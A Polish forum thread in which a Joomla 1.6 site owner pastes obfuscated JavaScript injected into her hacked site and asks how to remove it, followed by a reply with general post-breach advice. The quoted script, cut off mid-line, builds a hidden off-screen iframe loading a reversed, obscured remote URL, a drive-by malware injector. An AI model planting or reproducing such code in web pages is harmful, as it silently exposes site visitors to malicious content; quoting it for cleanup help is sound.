Witam,

nasza strona oparta o Joomlę 1.6 została zaatakowana (wiem, że system był nieaktualny).
Google Webmaster Tools pokazuje, że wstrzyknięto zainfekowany kod:


<script type="text/javascript"> var wksajdiuq = "tluafed?igc.axqe/moc.ko-morf.ererereb//:ptth"; function sd5135GHEDF(agaga31323l) { var melm = document.getElementById("a35fdsfdsf62FFSSD"); if (typeof(melm) != "undefined" && melm!= null) {}else{ var dsdSSSWrw515312FFF = document.createElement("iframe"); dsdSSSWrw515312FFF.id = "a35fdsfdsf62FFSSD"; dsdSSSWrw515312FFF.style.width = "10px"; dsdSSSWrw515312FFF.style.height = "10px"; dsdSSSWrw515312FFF.style.border = "0px"; dsdSSSWrw515312FFF.frameBorder = "0"; dsdSSSWrw515312FFF.style.position = "absolute"; dsdSSSWrw515312FFF.style.left = "-200"; dsdSSSWrw515312FFF.setAttribute("frameBorder", "0"); document.body.appendChild(dsdSSSWrw515312FFF); dsdSSSWrw515312FFF.src = agaga31323l; return true; } } function asd61234tkhjasd454hfhf235(){ sd5135GHEDF(wksajdiuq.split("").reverse().join

Niestety w index.php nie znajduję tego kodu i nie wiem, jak mogę go weliminować?
Będę bardzo wdzięczna za jakąkolwiek pomoc.

@grafia
1. Wiem że jesteś zdenerwowana ale to dział Joomla 3
2. Widzę że to albo drugi atak albo wasza Joomla straciła od 17 jedną jednostkę (http://forum.joomla.pl/showthread.php?75378-Zlecimy-przywr%C3%B3cenie-strony-i-aktualizajc%C4%99-z-1-7-do-2-5)
3. Jeżeli pomimo wszystko chcesz się tym zająć sama - poszukaj hasła "postępowanie po włamaniu" - powtarzane na tym forum niczym modlitwa w kościele
4. Jeżeli będziesz naprawiać to sama - niezależnie od wszystkiego najpierw kopia zapasowa ponieważ nieumiejętne próby działań naprawczych mogą doprowadzić do nieodwracalnej utraty danych
5. zagdanienie jest poważne i jako takie raczej nie do ogranięcia przez debiutanta - więc oceń realnie swoje umiejętności i albo zowstaw w dziale zleceń - tam gdzie jest, albo walcz - Powodzenia